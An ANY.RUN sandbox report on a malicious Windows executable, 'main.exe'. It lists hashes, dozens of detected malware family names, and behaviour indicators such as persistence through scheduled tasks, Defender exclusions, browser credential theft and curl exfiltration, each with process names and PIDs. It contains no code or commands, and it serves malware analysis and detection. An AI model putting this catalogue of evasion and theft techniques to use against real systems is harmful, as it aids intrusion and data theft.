File name:

main.exe

Full analysis: https://app.any.run/tasks/a179ceeb-32cb-4eb0-97ad-177ff6620e67
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Analysis date: April 25, 2026, 16:19:27
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto
xworm
rat
anti-evasion
phorpiex
botnet
github
stealer
weedhack
possible-phishing
clickfix
powershell
python
stealc
tinynuke
phishing
generic
quasar
violetworm
worm
action1rmm
xenorat
havoc
tool
smoke
loader
koiloader
networm
amus
njrat
bladabindi
remcos
clipbanker
guloader
remote
cryptowall
ransomware
cobaltstrike
wannacry
adware
redline
telegram
pyinstaller
rustystealer
pushware
evasion
pastebin
zigclipper
gotohttp
rmm-tool
datto
autoit
discord
vidar
cryptolocker
gh0st
gh0stcringe
autohotkey
dattormm
pythonstealer
ghostsocks
proxyware
metastealer
salatstealer
putty
muckstealer
susp-powershell
lumma
websocket
donutloader
exfiltration
coinminer
miner
xred
backdoor
heodo
neshta
delphi
action1
emmenhtal
agenttesla
api-base64
hijackloader
amadey
openssl
deerstealer
netsupport
santastealer
chromelevator
hacktool
inject
whitesnake
destinystealer
asyncrat
tofsee
stealerium
rustdesk
amsi-bypass
violet
screenconnect
rhadamanthys
rdpwrap
meterpreter
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:

C942A56638772644D847709D906FA23D

SHA1:

12D6B77FEC2244CDC4050A083AA741185CC48010

SHA256:

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

SSDEEP:

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • XWORM has been found (auto)

      • main.exe (PID: 6884)
      • main.exe (PID: 8072)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 3200)
      • ShellHost.exe (PID: 2736)
      • cmd.exe (PID: 4700)
    • Changes the login/logoff helper path in the registry

      • bot_x64.exe (PID: 508)
    • Runs injected code in another process

      • bot_x64.exe (PID: 508)
      • Loader.exe (PID: 10276)
      • Loader.exe (PID: 14328)
    • Application was injected by another process

      • explorer.exe (PID: 4696)
    • TINYNUKE has been found (auto)

      • main.exe (PID: 8072)
    • QUASAR has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • GENERIC has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • UniversalBrowser.exe (PID: 8592)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • Axam.a.exe (PID: 10244)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • Amus.exe (PID: 10812)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • assignment.exe (PID: 21224)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • powershell.exe (PID: 13912)
      • main.exe (PID: 8072)
    • VIOLETWORM has been found (auto)

      • main.exe (PID: 8072)
      • he.exe (PID: 7196)
    • SMOKE has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • Changes powershell execution policy (Bypass)

      • main.exe (PID: 8072)
      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
      • Pjibf.exe (PID: 8340)
      • powershell.exe (PID: 9208)
      • powershell.exe (PID: 9088)
      • powershell.exe (PID: 18896)
    • PHORPIEX has been detected

      • main.exe (PID: 8072)
    • ACTION1RMM has been found (auto)

      • main.exe (PID: 8072)
    • Stealers network behavior

      • svchost.exe (PID: 2232)
      • build.exe (PID: 14080)
      • randll32.exe (PID: 18904)
    • Copies file to a new location (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
    • WEEDHACK has been detected (SURICATA)

      • svchost.exe (PID: 2232)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8668)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8668)
    • PHORPIEX has been detected (SURICATA)

      • main.exe (PID: 8072)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 8396)
    • Create files in the Startup directory

      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • Axam.a.exe (PID: 10244)
      • explorer.exe (PID: 13080)
      • n743.exe (PID: 8800)
      • NP6lceA4ayWl.exe (PID: 16292)
      • hAvav2N7QWPr.exe (PID: 16164)
      • snd16061.exe (PID: 11732)
      • Fast%20Download.exe (PID: 21056)
      • Cloudy.exe (PID: 19428)
    • Changes the autorun value in the registry

      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • Loader.exe (PID: 10276)
      • Axam.a.exe (PID: 10244)
      • explorer.exe (PID: 13080)
      • WannaCry.exe (PID: 14000)
      • Amus.exe (PID: 10812)
      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • EDMSLauncherSetup.exe (PID: 12576)
      • rmd_en_1.exe (PID: 14112)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • n743.exe (PID: 8800)
      • Axam.exe (PID: 14780)
      • Loader.exe (PID: 14328)
      • NP6lceA4ayWl.exe (PID: 16292)
      • hAvav2N7QWPr.exe (PID: 16164)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • Axam.exe (PID: 17348)
      • ChilledWindows.GUI.exe (PID: 19688)
      • imgs.exe (PID: 19696)
      • assignment.exe (PID: 21224)
      • reg.exe (PID: 22920)
      • Axam.exe (PID: 22656)
      • Serials_Checker.exe (PID: 12488)
      • reg.exe (PID: 24836)
      • Server.exe (PID: 18108)
      • dxwebsetup.exe (PID: 18212)
      • Axam.exe (PID: 4116)
      • Decred.exe (PID: 15764)
      • Axam.exe (PID: 12604)
      • Axam.exe (PID: 21160)
      • Axam.exe (PID: 3100)
      • Axam.exe (PID: 27576)
      • Axam.exe (PID: 25856)
      • Axam.exe (PID: 27264)
      • Axam.exe (PID: 27336)
      • Axam.exe (PID: 21548)
      • Axam.exe (PID: 29260)
      • Axam.exe (PID: 28572)
      • Axam.exe (PID: 19872)
      • Axam.exe (PID: 2988)
      • Axam.exe (PID: 20708)
      • Axam.exe (PID: 18852)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 28848)
      • Axam.exe (PID: 21520)
      • Axam.exe (PID: 29900)
      • Axam.exe (PID: 24420)
      • Axam.exe (PID: 29492)
      • Axam.exe (PID: 31336)
      • Axam.exe (PID: 31500)
      • Axam.exe (PID: 31656)
      • Axam.exe (PID: 31360)
    • CLICKFIX has been detected (SURICATA)

      • svchost.exe (PID: 2232)
      • main.exe (PID: 8072)
      • x64-setup.exe (PID: 17396)
    • REMCOS has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • FXServer.exe (PID: 17808)
    • STEALC has been detected (SURICATA)

      • svchost.exe (PID: 2232)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 9292)
      • powershell.exe (PID: 21484)
    • COBALTSTRIKE has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • HAVOC has been found (auto)

      • main.exe (PID: 8072)
    • KOILOADER has been found (auto)

      • main.exe (PID: 8072)
    • COINMINER has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • RUSTYSTEALER has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • XenoRAT has been detected (FILE)

      • Client.exe (PID: 10284)
    • REDLINE has been found (auto)

      • main.exe (PID: 8072)
    • NETWORM mutex has been found

      • Amus.exe (PID: 10812)
    • DATTORMM has been found (auto)

      • main.exe (PID: 8072)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2232)
    • NJRAT mutex has been found

      • n743.exe (PID: 8800)
      • Fast%20Download.exe (PID: 21056)
    • STEALC has been detected

      • build1.exe (PID: 12548)
      • 1.exe (PID: 16212)
    • PUSHWARE has been found (auto)

      • main.exe (PID: 8072)
    • CRYPTOWALL has been detected

      • explorer.exe (PID: 13080)
      • explorer.exe (PID: 13080)
      • Taskmgr.exe (PID: 7876)
    • XWORM has been detected (SURICATA)

      • he.exe (PID: 7196)
      • VIolet.exe (PID: 8480)
      • hey.exe (PID: 8448)
      • WerFault.exe (PID: 13848)
    • Executing a file with an untrusted certificate

      • tomcat8.exe (PID: 14024)
      • 32.exe (PID: 16848)
      • tlp.exe (PID: 15048)
      • lol1.exe (PID: 17660)
      • brbotnet.exe (PID: 17668)
      • steamcmd.exe (PID: 17580)
      • lol.exe (PID: 17576)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • sm.exe (PID: 19328)
      • chrome_134.exe (PID: 12024)
      • c1i.exe (PID: 19228)
      • Ytkjmt.exe (PID: 20228)
      • Setup.exe (PID: 20872)
      • game.exe (PID: 10460)
      • v1d.exe (PID: 13364)
      • haozip.100021.exe (PID: 12740)
      • Setup.exe (PID: 23792)
      • cr.exe (PID: 23732)
      • vc2005sp1redist_x86.exe (PID: 24976)
      • HaoZipLoader.exe (PID: 22608)
      • cqsj.exe (PID: 7288)
      • steamcmd.exe (PID: 25744)
      • PrivacyPolicy.exe (PID: 19912)
      • dts.exe (PID: 29504)
      • dts.exe (PID: 14572)
      • RedX_Setup.exe (PID: 26440)
      • Srfuhxm.exe (PID: 33276)
      • steamcmd.exe (PID: 27248)
    • Changes settings of System certificates

      • msiexec.exe (PID: 8928)
      • EdmsLauncher.exe (PID: 15280)
      • powershell.exe (PID: 10076)
      • msiexec.exe (PID: 22832)
      • HaoZipLoader.exe (PID: 22608)
      • certinst.exe (PID: 28708)
    • WANNACRY mutex has been found

      • WannaCry.exe (PID: 14000)
    • GHOSTSOCKS has been found (auto)

      • main.exe (PID: 8072)
    • ADWARE has been detected (SURICATA)

      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
    • Creates or modifies Windows services

      • 1.exe (PID: 14192)
      • 1.exe (PID: 14200)
      • RDPWInst.exe (PID: 23476)
    • MUCKSTEALER has been found (auto)

      • main.exe (PID: 8072)
    • Uses Task Scheduler to run other applications

      • n743.exe (PID: 8800)
    • Steals credentials from Web Browsers

      • L7XH7UR9695U.exe (PID: 14104)
      • ksv.exe (PID: 16932)
      • conhost.exe (PID: 20008)
      • mvc3.exe (PID: 7572)
    • Actions looks like stealing of personal data

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • ksv.exe (PID: 16932)
      • cvf.exe (PID: 20776)
      • mvc3.exe (PID: 7572)
      • Pjibf.exe (PID: 8340)
      • bypass.exe (PID: 25216)
      • bnkrigkawd.exe (PID: 26680)
    • HEODO has been found (auto)

      • main.exe (PID: 8072)
    • GOTOHTTP has been found

      • g64.exe (PID: 17160)
      • g64.exe (PID: 17036)
      • g64.exe (PID: 17328)
      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
    • Signed with known abused certificate

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • DONUTLOADER has been found (auto)

      • main.exe (PID: 8072)
    • GOTOHTTP mutex has been found

      • g64.exe (PID: 17328)
      • g64.exe (PID: 17160)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
      • wscript.exe (PID: 31004)
    • DEERSTEALER has been found (auto)

      • main.exe (PID: 8072)
    • Checks whether a specified folder exists (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
    • EMMENHTAL has been detected (YARA)

      • main.exe (PID: 8072)
    • VIDAR has been detected

      • svchost.exe (PID: 16868)
      • chrome_134.exe (PID: 12024)
    • SANTASTEALER has been found (auto)

      • main.exe (PID: 8072)
    • SALATSTEALER mutex has been found

      • randll32.exe (PID: 18904)
    • DESTINYSTEALER has been found (auto)

      • main.exe (PID: 8072)
      • imgs.exe (PID: 19696)
    • Execute application with conhost.exe as parent process

      • msedge.exe (PID: 10840)
      • firefox.exe (PID: 7412)
      • chrome.exe (PID: 19784)
      • chrome.exe (PID: 21316)
      • msedge.exe (PID: 20820)
      • firefox.exe (PID: 21496)
    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 10084)
    • REDLINE has been detected (SURICATA)

      • build.exe (PID: 14080)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 10092)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 10092)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 10092)
    • NJRAT has been found (auto)

      • main.exe (PID: 8072)
    • METERPRETER has been found (auto)

      • main.exe (PID: 8072)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 10092)
    • STEALER has been found (auto)

      • main.exe (PID: 8072)
    • ASYNCRAT has been found (auto)

      • main.exe (PID: 8072)
      • main.exe (PID: 8072)
    • RHADAMANTHYS has been found (auto)

      • main.exe (PID: 8072)
    • REMCOS has been detected

      • prueba.exe (PID: 22456)
    • Known privilege escalation attack

      • dllhost.exe (PID: 15076)
    • Changes Windows Defender settings

      • explorer.exe (PID: 4696)
      • nslookup.exe (PID: 22816)
      • Vikings.exe (PID: 21892)
    • Adds path to the Windows Defender exclusion list

      • explorer.exe (PID: 4696)
      • msedge.exe (PID: 16628)
      • conhost.exe (PID: 18116)
      • Vikings.exe (PID: 21892)
      • x834.exe (PID: 14060)
      • XClient.exe (PID: 19376)
    • Adds extension to the Windows Defender exclusion list

      • nslookup.exe (PID: 22816)
    • LUMMA has been detected (SURICATA)

      • bsg.exe (PID: 17228)
      • svchost.exe (PID: 2232)
    • Suspicious data exfiltration via CURL detected

      • ksv.exe (PID: 16932)
      • cmd.exe (PID: 17288)
      • mvc3.exe (PID: 7572)
      • cmd.exe (PID: 25068)
      • cmd.exe (PID: 26700)
      • cmd.exe (PID: 2136)
      • cmd.exe (PID: 15724)
    • Registers / Runs the DLL via REGSVR32.EXE

      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
    • STEALC mutex has been found

      • 1488.exe (PID: 19436)
    • VIDAR mutex has been found

      • 1488.exe (PID: 21740)
    • WannaCry Ransomware is detected

      • WannaCry.exe (PID: 14000)
    • QUASAR mutex has been found

      • Client-built.exe (PID: 15792)
    • XRED mutex has been found

      • Server.exe (PID: 18108)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • %E6%83%85%E6%84%BF%E6%80%80%E6%97%A7.exe (PID: 8432)
    • VIOLET has been detected (YARA)

      • he.exe (PID: 7196)
    • Generic malware mutex has been detected

      • DRIVEapplet.exe (PID: 21680)
    • NESHTA mutex has been found

      • cfxre.exe (PID: 13372)
      • FXServer.exe (PID: 17808)
    • METASTEALER has been detected (SURICATA)

      • build.exe (PID: 14080)
    • AMADEY mutex has been found

      • pfntjejghjsdkr.exe (PID: 17760)
      • Gxtuum.exe (PID: 33256)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 18896)
      • powershell.exe (PID: 12712)
    • CHROMELEVATOR has been detected

      • chromelevator.exe (PID: 10808)
    • Changes the Windows auto-update feature

      • taskmoder.exe (PID: 26396)
    • WhiteSnake has been detected

      • bnkrigkawd.exe (PID: 26680)
    • WiFi password harvest via netsh

      • cssgo.exe (PID: 26244)
    • MINER has been detected (SURICATA)

      • xblkpfZ8Y4.exe (PID: 20608)
    • RDPWRAP has been detected

      • RDPWInst.exe (PID: 23476)
  • SUSPICIOUS

    • Application launched itself

      • main.exe (PID: 6884)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • ksv.exe (PID: 15800)
      • g64.exe (PID: 17160)
      • Isass.exe (PID: 13720)
      • powershell.exe (PID: 9208)
      • mvc3.exe (PID: 17696)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 9088)
      • cvf.exe (PID: 18624)
      • zx.exe (PID: 16236)
      • 1488.exe (PID: 19436)
      • gallery-dl.exe (PID: 21828)
      • q-AMD64-Windows.exe (PID: 10208)
      • darts-wled.exe (PID: 21632)
      • darts-pixelit.exe (PID: 8264)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
      • steamcmd.exe (PID: 17580)
      • powershell.exe (PID: 18896)
      • main.exe (PID: 8072)
      • main1.exe (PID: 29364)
      • main1.exe (PID: 29372)
      • main1.exe (PID: 29356)
      • Stub.exe (PID: 21192)
      • X空间.exe (PID: 23068)
      • VC_redist.x64.exe (PID: 16856)
      • cd4.exe (PID: 1652)
      • steamcmd.exe (PID: 25744)
    • Executable content was dropped or overwritten

      • main.exe (PID: 6884)
      • main.exe (PID: 8072)
      • bot_x64.exe (PID: 508)
      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • Qbix01.exe (PID: 8860)
      • pardufrigi_installer_1.0.p1.exe (PID: 8556)
      • Bexitor%20Installer.exe (PID: 10232)
      • Client.exe (PID: 10284)
      • Axam.a.exe (PID: 10244)
      • pardufrigi_installer_1.0.p1.tmp (PID: 11184)
      • Prolin.exe (PID: 10772)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • EDMSLauncherSetup.exe (PID: 12576)
      • yc.exe (PID: 11436)
      • 3yjehc7m.exe (PID: 12404)
      • explorer.exe (PID: 13080)
      • WannaCry.exe (PID: 14000)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • Amus.exe (PID: 10812)
      • 1.exe (PID: 14192)
      • 1.exe (PID: 14200)
      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • rmd_en_1.exe (PID: 14112)
      • Pinaview.exe (PID: 14984)
      • 37cqsj.exe (PID: 14052)
      • RMO_SE~2.EXE (PID: 15232)
      • G7_Update.exe (PID: 14380)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • ksv.exe (PID: 15800)
      • s287.exe (PID: 16184)
      • setup.exe (PID: 15320)
      • 2.exe (PID: 16308)
      • Pinaview.tmp (PID: 15548)
      • is-LLDTH.tmp (PID: 15832)
      • n743.exe (PID: 8800)
      • NP6lceA4ayWl.exe (PID: 16292)
      • is-TSIJD.tmp (PID: 6092)
      • namu864.exe (PID: 16600)
      • cfxre.exe (PID: 13372)
      • ui.exe (PID: 17736)
      • mvc3.exe (PID: 17696)
      • Isass.exe (PID: 13720)
      • NAMUVPN32.exe (PID: 18180)
      • lol11.exe (PID: 17596)
      • giftorder.exe (PID: 18132)
      • lol1.exe (PID: 17660)
      • gertgherthre.exe (PID: 3448)
      • fastping_silent_v4.exe (PID: 17780)
      • Server.exe (PID: 18108)
      • ZJQPPAJN.exe (PID: 19452)
      • namuvpnxp.exe (PID: 19348)
      • 5252.exe (PID: 19368)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • yx_dts.exe (PID: 19084)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • q8348.exe (PID: 18124)
      • sm.exe (PID: 19328)
      • RDPW_Installer.exe (PID: 10824)
      • ChilledWindows.GUI.exe (PID: 19688)
      • ShellHost.exe (PID: 2736)
      • imgs.exe (PID: 19696)
      • zx.exe (PID: 16236)
      • NanoCore_Portable.exe (PID: 12160)
      • snd16061.exe (PID: 11732)
      • csc.exe (PID: 19788)
      • CritScript.exe (PID: 14976)
      • assignment.exe (PID: 21224)
      • FXServer.exe (PID: 17808)
      • 21.exe (PID: 9176)
      • gallery-dl.exe (PID: 21828)
      • darts-pixelit.exe (PID: 8264)
      • q-AMD64-Windows.exe (PID: 10208)
      • darts-wled.exe (PID: 21632)
      • 444.exe (PID: 21096)
      • 4.exe (PID: 12296)
      • 21.tmp (PID: 20580)
      • game.exe (PID: 10460)
      • csc.exe (PID: 10520)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • steamcmd.exe (PID: 17580)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
      • DowOnline.Installer.exe (PID: 11080)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • haozip.100021.exe (PID: 12740)
      • teleport-assist-windows.exe (PID: 24604)
    • Loads Python modules

      • main.exe (PID: 8072)
      • ksv.exe (PID: 16932)
      • mvc3.exe (PID: 7572)
      • Isass.exe (PID: 18436)
      • zx.exe (PID: 20324)
      • gallery-dl.exe (PID: 11192)
      • q-AMD64-Windows.exe (PID: 22352)
      • darts-wled.exe (PID: 23096)
      • darts-pixelit.exe (PID: 23252)
      • Vector-fixer-v1.4.2.exe (PID: 24108)
      • IcarusLite-v1.1.13-win.exe (PID: 24656)
      • main1.exe (PID: 30280)
      • main.exe (PID: 29244)
      • main1.exe (PID: 23532)
      • main1.exe (PID: 25564)
      • Stub.exe (PID: 31024)
      • cd4.exe (PID: 25380)
    • Creates scheduled task with highest privileges

      • cmd.exe (PID: 3200)
      • schtasks.exe (PID: 7844)
      • schtasks.exe (PID: 19564)
      • schtasks.exe (PID: 20196)
      • powershell.exe (PID: 17452)
      • cmd.exe (PID: 4700)
      • schtasks.exe (PID: 10780)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3200)
      • cmd.exe (PID: 7176)
      • cmd.exe (PID: 8440)
      • cmd.exe (PID: 10108)
      • cmd.exe (PID: 10556)
      • cmd.exe (PID: 10452)
      • cmd.exe (PID: 11888)
      • cmd.exe (PID: 12500)
      • cmd.exe (PID: 14036)
      • cmd.exe (PID: 13224)
      • cmd.exe (PID: 14972)
      • cmd.exe (PID: 14432)
      • cmd.exe (PID: 15512)
      • cmd.exe (PID: 15620)
      • cmd.exe (PID: 18520)
      • cmd.exe (PID: 18960)
      • cmd.exe (PID: 19296)
      • cmd.exe (PID: 19484)
      • cmd.exe (PID: 19512)
      • cmd.exe (PID: 20108)
      • cmd.exe (PID: 20236)
      • cmd.exe (PID: 20532)
      • cmd.exe (PID: 13656)
      • cmd.exe (PID: 8908)
      • cmd.exe (PID: 21656)
      • cmd.exe (PID: 17288)
      • cmd.exe (PID: 22396)
      • cmd.exe (PID: 10960)
      • cmd.exe (PID: 23628)
      • cmd.exe (PID: 24156)
      • cmd.exe (PID: 24320)
      • cmd.exe (PID: 24740)
      • cmd.exe (PID: 24156)
      • cmd.exe (PID: 22380)
      • cmd.exe (PID: 15000)
      • cmd.exe (PID: 26900)
      • cmd.exe (PID: 27212)
      • cmd.exe (PID: 27632)
      • cmd.exe (PID: 25068)
      • cmd.exe (PID: 13800)
      • cmd.exe (PID: 26700)
      • cmd.exe (PID: 29128)
      • cmd.exe (PID: 18784)
      • cmd.exe (PID: 2136)
      • cmd.exe (PID: 16148)
      • cmd.exe (PID: 15824)
      • cmd.exe (PID: 33036)
      • cmd.exe (PID: 33140)
      • cmd.exe (PID: 28792)
      • cmd.exe (PID: 15724)
      • cmd.exe (PID: 20372)
      • cmd.exe (PID: 27888)
      • cmd.exe (PID: 28668)
      • cmd.exe (PID: 32644)
      • cmd.exe (PID: 4700)
      • cmd.exe (PID: 33284)
    • The process drops C-runtime libraries

      • main.exe (PID: 6884)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • ksv.exe (PID: 15800)
      • ui.exe (PID: 17736)
      • Isass.exe (PID: 13720)
      • mvc3.exe (PID: 17696)
      • ZJQPPAJN.exe (PID: 19452)
      • zx.exe (PID: 16236)
      • snd16061.exe (PID: 11732)
      • q-AMD64-Windows.exe (PID: 10208)
      • gallery-dl.exe (PID: 21828)
      • darts-pixelit.exe (PID: 8264)
      • darts-wled.exe (PID: 21632)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • game.exe (PID: 10460)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • steamcmd.exe (PID: 17580)
    • Creates scheduled task with ONLOGON parameter

      • cmd.exe (PID: 3200)
      • main.exe (PID: 8072)
      • q8348.exe (PID: 18124)
      • ShellHost.exe (PID: 2736)
      • explorer.exe (PID: 4696)
      • main.exe (PID: 29244)
      • cmd.exe (PID: 4700)
    • The process checks if it is being run in the virtual environment

      • main.exe (PID: 8072)
      • cummersMG.exe (PID: 11132)
      • pieletJF_vm.exe (PID: 12568)
      • pieletJF.exe (PID: 11500)
      • svchost.exe (PID: 17800)
      • 1210.exe (PID: 17192)
      • dialer.exe (PID: 32296)
    • The process creates files with name similar to system file names

      • bot_x64.exe (PID: 508)
      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • yc.exe (PID: 11436)
      • 3yjehc7m.exe (PID: 12404)
      • 37cqsj.exe (PID: 14052)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • main.exe (PID: 8072)
      • sm.exe (PID: 19328)
      • yx_dts.exe (PID: 19084)
      • 444.exe (PID: 21096)
      • steamcmd.exe (PID: 17580)
      • haozip.100021.exe (PID: 12740)
      • teleport-assist-windows.exe (PID: 24604)
      • 7zG.exe (PID: 26004)
      • System.exe (PID: 26804)
      • steamcmd.exe (PID: 25744)
    • Reads the date of Windows installation

      • bot_x64.exe (PID: 508)
      • msedge.exe (PID: 16628)
      • conhost.exe (PID: 18116)
      • imgs.exe (PID: 19696)
      • x834.exe (PID: 14060)
      • black.exe (PID: 26308)
      • X空间.exe (PID: 23068)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 7008)
      • mshta.exe (PID: 2684)
      • mshta.exe (PID: 2524)
      • mshta.exe (PID: 5616)
      • mshta.exe (PID: 6148)
      • mshta.exe (PID: 8980)
      • mshta.exe (PID: 9016)
      • mshta.exe (PID: 12000)
      • mshta.exe (PID: 17456)
      • mshta.exe (PID: 25604)
      • mshta.exe (PID: 15672)
      • mshta.exe (PID: 27588)
    • Starts POWERSHELL.EXE for commands execution

      • main.exe (PID: 8072)
      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
      • cmd.exe (PID: 8440)
      • cmd.exe (PID: 10108)
      • Pjibf.exe (PID: 8340)
      • powershell.exe (PID: 9208)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 9088)
      • cmd.exe (PID: 19512)
      • explorer.exe (PID: 4696)
      • nslookup.exe (PID: 22816)
      • conhost.exe (PID: 18116)
      • powershell.exe (PID: 18896)
      • ljgksdtihd.exe (PID: 15704)
      • Vikings.exe (PID: 21892)
      • cmd.exe (PID: 13800)
      • better.exe (PID: 14008)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 9088)
      • powershell.exe (PID: 9208)
      • powershell.exe (PID: 10076)
      • powershell.exe (PID: 10092)
      • powershell.exe (PID: 10084)
      • powershell.exe (PID: 10144)
      • powershell.exe (PID: 10220)
      • powershell.exe (PID: 10256)
      • powershell.exe (PID: 10348)
      • powershell.exe (PID: 10340)
      • powershell.exe (PID: 10464)
      • powershell.exe (PID: 10740)
      • powershell.exe (PID: 10748)
      • powershell.exe (PID: 10864)
      • powershell.exe (PID: 10904)
      • powershell.exe (PID: 10912)
      • powershell.exe (PID: 10172)
      • powershell.exe (PID: 11404)
      • powershell.exe (PID: 11428)
      • powershell.exe (PID: 12540)
      • powershell.exe (PID: 14140)
      • powershell.exe (PID: 14148)
      • powershell.exe (PID: 12492)
      • powershell.exe (PID: 16224)
      • powershell.exe (PID: 18896)
      • powershell.exe (PID: 12712)
      • powershell.exe (PID: 22976)
      • powershell.exe (PID: 28140)
      • powershell.exe (PID: 28324)
      • powershell.exe (PID: 29252)
      • powershell.exe (PID: 15728)
    • Process drops python dynamic module

      • main.exe (PID: 6884)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • ksv.exe (PID: 15800)
      • ui.exe (PID: 17736)
      • Isass.exe (PID: 13720)
      • mvc3.exe (PID: 17696)
